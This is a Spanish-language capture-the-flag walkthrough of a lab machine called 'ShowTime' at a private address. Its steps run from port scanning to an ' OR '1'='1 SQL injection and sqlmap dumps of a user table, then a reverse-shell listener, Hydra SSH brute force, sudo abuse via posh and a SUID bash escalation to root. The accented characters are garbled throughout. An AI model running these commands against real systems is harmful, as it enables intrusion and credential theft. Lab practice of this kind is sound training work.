# ShowTime
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 172.17.0.2
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 **EXPLORACI脫N**
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80 -v 172.17.0.2
```
para obtener m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web del Casino.
Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a trav茅s de:
```bash
gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,doc,html,txt
```
Hacemos una **inyecci贸n SQL** b谩sica en el directorio `/login_page`.
```bash
' OR '1'='1
```
Realizamos este comando para identificar bases de datos.
```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms --dbs --batch
```
Ahora para ver las tablas dentro de la base de datos de **users**.
```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users --tables --batch
```
Ahora vemos las columnas dentro de la tabla de **usuarios**.
```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios --columns --batch
```
Ahora vemos la informaci贸n que hay guardada en los registros.
```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios -C password,id,username --dump --batch
```
### 馃殌 **EXPLOTACI脫N**
Con el tercer usuario nos logueamos y nos sale un panel de administraci贸n en el que podemos ejecutar un comando en **Python**.
Nos ponemos en escucha para recibir la Reverse Shell.
```bash
nc -nlvp 443
```
Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar m谩s c贸modos.
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar. No tenemos permisos con SUDO.
En el directorio `/tmp` hay una archivo del texto oculto.
Creamos un diccionario pasando de may煤sculas a min煤sculas para realizar la fuerza bruta.
```bash
tr '[:upper:]' '[:lower:]' < trucos.txt > diccionario.txt
```
Realizamos el ataque de fuerza bruta mediante **Hydra**.
```bash
hydra -l joe -P diccionario.txt ssh://172.17.0.2 -t 64
```
Nos logueamos con esas credenciales encontradas.
```bash
ssh joe@172.17.0.2
```
Tenemos permisos **SUDO** con **posh** por lo que miramos esta [p谩gina ](https://gtfobins.github.io/gtfobins/posh/)para ver como escalar privilegios.
```bash
sudo -u luciano /bin/posh
```
En el directorio de **luciano** principal encontramos un script que no podemos editar con nano ni con vim por lo que lo hacemos con echo.
```bash
echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > script.sh
```
Ahora ejecutamos el script para ser **root**.
```bash
sudo -u root /bin/bash /home/luciano/script.sh
```
Ejecutamos.
```bash
bash -p
```
